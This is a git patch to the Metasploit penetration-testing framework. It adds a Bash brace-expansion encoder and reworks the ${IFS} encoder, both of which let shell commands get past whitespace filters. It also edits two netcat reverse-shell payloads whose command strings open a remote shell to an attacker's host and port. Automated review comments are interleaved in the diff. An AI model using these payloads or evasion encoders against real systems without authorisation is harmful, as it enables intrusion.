From 0294d7eed1920a1803cdba93d1437e84eab0641f Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Sat, 25 Aug 2018 22:23:07 -0500
Subject: [PATCH] Land #10516, Add brace expansion encoder and update ${IFS} encoder
---
 lib/msf/core/encoder.rb | 8 +++-
 modules/encoders/cmd/brace.rb | 33 +++++++++++++++
 modules/encoders/cmd/ifs.rb | 40 +++++++------------
 .../singles/cmd/unix/reverse_netcat.rb | 2 +-
 .../singles/cmd/unix/reverse_netcat_gaping.rb | 4 +-
 5 files changed, 57 insertions(+), 30 deletions(-)
 create mode 100644 modules/encoders/cmd/brace.rb
diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb
index dc912a7dbe..b7209576d9 100644
--- a/lib/msf/core/encoder.rb
+++ b/lib/msf/core/encoder.rb
@@ -136,9 +136,13 @@ class Encoder < Module
 #
 CmdUnixEcho = 'echo'
 #
- # Bourne shell IFS encoding.
+ # Bourne shell ${IFS} encoding.
 #
- CmdUnixIfs = 'ifs'
+ CmdUnixIFS = 'ifs'
+ #
+ # Bash brace expansion encoding.
+ #
+ CmdUnixBrace = 'brace'
 end
 #
diff --git a/modules/encoders/cmd/brace.rb b/modules/encoders/cmd/brace.rb
new file mode 100644
index 0000000000..4c96a122a9
--- /dev/null
+++ b/modules/encoders/cmd/brace.rb
@@ -0,0 +1,33 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder
+
+ # This may produce incorrect code due to minimal escaping
+ Rank = LowRanking
+
+ def initialize
+ super(
+ 'Name' => 'Bash Brace Expansion Command Encoder',
+ 'Description' => %q{
+ This encoder uses brace expansion in Bash and other shells
+ to avoid whitespace without being overly fancy.
+ },
+ 'Author' => ['wvu', 'egypt'],
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'EncoderType' => Msf::Encoder::Type::CmdUnixBrace
+ )
+ end
+
+ def encode_block(state, buf)
+ # Skip encoding if there are no badchars
+ return buf if state.badchars !~ /\s/
+
+ # Perform brace expansion encoding
+ "{#{buf.gsub(',', '\\,').gsub(/\s+/, ',')}}"
+ end
+
+end
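Review bot: Renaming the public constant `CmdUnixIfs` to `CmdUnixIFS` without keeping the old name means any out-of-tree encoder or payload that still references `Msf::Encoder::Type::CmdUnixIfs` fails with a `NameError` when loaded; only `modules/encoders/cmd/ifs.rb` is updated by this patch. Keeping a compatibility alias next to the new constant, `CmdUnixIfs = CmdUnixIFS # old spelling, kept for third-party modules`, avoids that at no cost and can be dropped in a later release. The module that holds these constants opens before the hunk.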
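Review bot: `encode_block` in brace.rb checks only `state.badchars` for whitespace and never `buf`, so a payload that contains no whitespace is returned as `{payload}`; a brace group with no comma is not expanded by bash, and the literal braces corrupt the command. Adding `return buf unless buf =~ /\s/` after the badchars guard keeps such input untouched. Trailing whitespace in `buf` produces a group ending in `,`, which appears to be why the two netcat payloads in this patch drop their trailing space; handling it once here would cover every payload. The header comment above `Rank` could also spell out the limits the ranking hints at, e.g. `# Braces and quotes in the command are not escaped, and POSIX sh/dash do not perform brace expansion at all`.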
diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb
index 2f2046ad3c..5c849db97e 100644
--- a/modules/encoders/cmd/ifs.rb
+++ b/modules/encoders/cmd/ifs.rb
@@ -5,39 +5,29 @@
 class MetasploitModule < Msf::Encoder
- # Below normal ranking because this will produce incorrect code a lot of
- # the time.
+ # This may produce incorrect code, such as in quoted strings
 Rank = LowRanking
 def initialize
 super(
- 'Name' => 'Generic ${IFS} Substitution Command Encoder',
- 'Description' => %q{
- This encoder uses standard Bourne shell variable substitution
- to avoid spaces without being overly fancy.
+ 'Name' => 'Bourne ${IFS} Substitution Command Encoder',
+ 'Description' => %q{
+ This encoder uses Bourne ${IFS} substitution to avoid whitespace
+ without being overly fancy.
 },
- 'Author' => 'egypt',
- 'Arch' => ARCH_CMD,
- 'Platform' => 'unix',
- 'EncoderType' => Msf::Encoder::Type::CmdUnixIfs)
+ 'Author' => ['egypt', 'wvu'],
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'EncoderType' => Msf::Encoder::Type::CmdUnixIFS
+ )
 end
-
- #
- # Encodes the payload
- #
 def encode_block(state, buf)
- # Skip encoding for empty badchars
- if state.badchars.length == 0
- return buf
- end
+ # Skip encoding if there are no badchars
+ return buf if state.badchars !~ /\s/
- # Skip encoding unless space is a badchar
- unless state.badchars.include?(" ")
- return buf
- end
-
- buf.gsub!(/\s/, '${IFS}')
- return buf
+ # Perform ${IFS} encoding
+ buf.gsub(/\s+/, '${IFS}')
 end
+
 end
diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat.rb b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
index 2579046f17..595efb0160 100644
--- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
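Review bot: `encode_block` lost its header comment in the same hunk where its contract changed: the old `buf.gsub!` rewrote `buf` in place, whereas the new `buf.gsub(/\s+/, '${IFS}')` returns a new string, leaves `buf` untouched, and folds each run of whitespace into a single `${IFS}`. A comment above `def encode_block(state, buf)` such as `# Returns a copy of buf with every run of whitespace replaced by ${IFS}; buf itself is not modified. No substitution happens inside single quotes, hence the low ranking.` would record that. The replacement also reintroduces `$`, `{` and `}` when those characters are in `state.badchars`; presumably the framework re-checks encoder output, but that is not visible from this hunk, so the comment could state the assumption.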
@@ -51,6 +51,6 @@ module MetasploitModule
 #
 def command_string
 backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
- "mkfifo /tmp/#{backpipe}; nc #{datastore['LHOST']} #{datastore['LPORT']} 0/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe} "
+ "mkfifo /tmp/#{backpipe}; nc #{datastore['LHOST']} #{datastore['LPORT']} 0/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
 end
 end
diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
index 6943ba8722..e58fa15740 100644
--- a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 module MetasploitModule
- CachedSize = 35
+ CachedSize = 34
 include Msf::Payload::Single
 include Msf::Sessions::CommandShellOptions
@@ -45,6 +45,6 @@ module MetasploitModule
 # Returns the command string to use for execution
 #
 def command_string
- "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
+ "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh"
 end
 end